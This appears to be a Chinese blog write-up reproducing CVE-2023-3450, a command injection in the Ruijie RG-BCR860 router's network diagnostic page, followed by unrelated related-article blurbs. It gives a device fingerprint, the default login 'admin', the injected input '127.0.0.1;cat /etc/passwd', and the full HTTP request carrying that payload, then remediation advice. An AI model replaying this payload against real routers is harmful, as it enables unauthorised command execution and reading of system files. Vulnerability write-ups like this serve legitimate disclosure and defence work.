Ruijie RG-BCR860 后台命令执行漏洞(CVE-2023-3450)

简介: Ruijie RG-BCR860 2.5.13 版本存在操作系统命令注入漏洞,攻击者可通过该漏洞获取服务器敏感信息,导致服务器被沦陷。

声明


  请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、简介


  北京星网锐捷网络技术有限公司,行业领先的ICT基础设施及行业解决方案提供商,主营业务为网络设备、网络安全产品及云桌面解决方案的研发、设计和销售。Ruijie Networks RG-BCR860是该公司的一款商业云路由器。


二、漏洞概述


  Ruijie RG-BCR860 2.5.13 版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。


漏洞编号:CVE-2023-3450


三、影响版本


  • Ruijie RG-BCR860 2.5.13 版本


四、环境搭建


非开源产品,无法搭建。

指纹特征: icon_hash="-399311436"


五、漏洞复现


该漏洞属于后台漏洞,需要输入默认密码admin进入后台

image.png

版本为:BCOS V2.5.10

image.png

   点击最下角的 “网络诊断”,在 "Tracert检测" 的 "地址" 框中,输入127.0.0.1;cat /etc/passwd,接着点 击 "开始检测",运行输入的命令,发现在检测框中回显了执行的命令。

image.png

Burp抓取命令执行的数据包如下:


GET /cgi-bin/luci/;stok=7159************************c3/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0 HTTP/1.1

Host: 127.0.0.1:6060

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36

X-Requested-With: XMLHttpRequest

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8

Cookie: sysauth=06a17629adb3bed0a6e95d9eeec0abe6

Connection: close

image.png

六、修复方式


  目前厂商已发布升级补丁以修复漏洞,该漏洞由于正常功能过滤不严格导致存在命令注入,并且需要高权限账号登录操作,建议修改登录密码为强口令,通过白名单控制访问原地址。

目录
相关文章
|
Web App开发 安全 物联网
大华智慧园区综合管理平台前台任意文件上传漏洞
大华智慧园区综合管理平台存在前台任意文件上传漏洞,攻击者可通过特定Payload获取服务器敏感信息,进而获取服务器控制权限。
2777 1
|
6月前
|
存储 自然语言处理 安全
大模型应用:医疗行业大模型:从生成前校验到生成后审计的应用实践.73
本文提出医疗大模型“生成前校验+生成后审计”全链路管控方案,通过输入完整性/合规性校验、隐私脱敏、标准化处理,及输出格式/准确性/隐私审计等闭环流程,确保病历撰写、医嘱辅助等场景安全、合规、准确落地。
637 7
|
8月前
|
消息中间件 人工智能 边缘计算
空地协同让电力巡检更智能 ——从人工攀爬到立体监测的技术演进
这是一套“空地协同”智能电力巡检系统:无人机搭载RTK+20倍变焦相机自主巡线,工程车集成AI边缘计算(Jetson AGX Orin)与红外检测,实现厘米级定位、小目标识别(92%+准确率)、无网环境本地分析+断点续传。系统已落地应用,显著降低人工登塔风险。
683 4
|
9月前
|
SQL 数据可视化 Java
Metabase 简介
Metabase 是一款开源数据可视化工具,支持多种数据库,提供直观的查询、仪表板和自动化报告功能。通过 Docker 或 JAR 快速部署,具备权限管理、SSO 集成与缓存优化,适合技术与非技术人员高效分析数据。
|
10月前
|
弹性计算 Linux 网络安全
阿里云购买云服务器流程及注意事项(新用户必看图文教程)
在当前数字化场景中,个人与企业开展线上业务时,部署网站或 APP 常需依托服务器。相较于逐渐被淘汰的虚拟主机和成本较高的独立服务器,云服务器凭借弹性扩展、性价比高等优势成为主流选择。阿里云作为国内云服务领域的重要服务商,其 ECS(弹性计算服务)地域节点丰富、配置选项灵活,但新手用户在选购时易对地域、实例规格、操作系统等配置产生困惑。本文将结合最新信息,详细梳理阿里云服务器的购买流程与核心配置选择要点,帮助新手高效完成选购。
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
3388 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
|
安全 Java 数据安全/隐私保护
数组越界可能导致哪些安全问题?
数组越界可能导致哪些安全问题?
666 57
|
Web App开发 XML 安全
海康威视iVMS综合安防系统任意文件上传漏洞
海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实施对目标的攻击。
1998 1
|
安全 网络安全 iOS开发
macOS系统安装NMAP扫描工具
macOS系统安装NMAP扫描工具
1347 1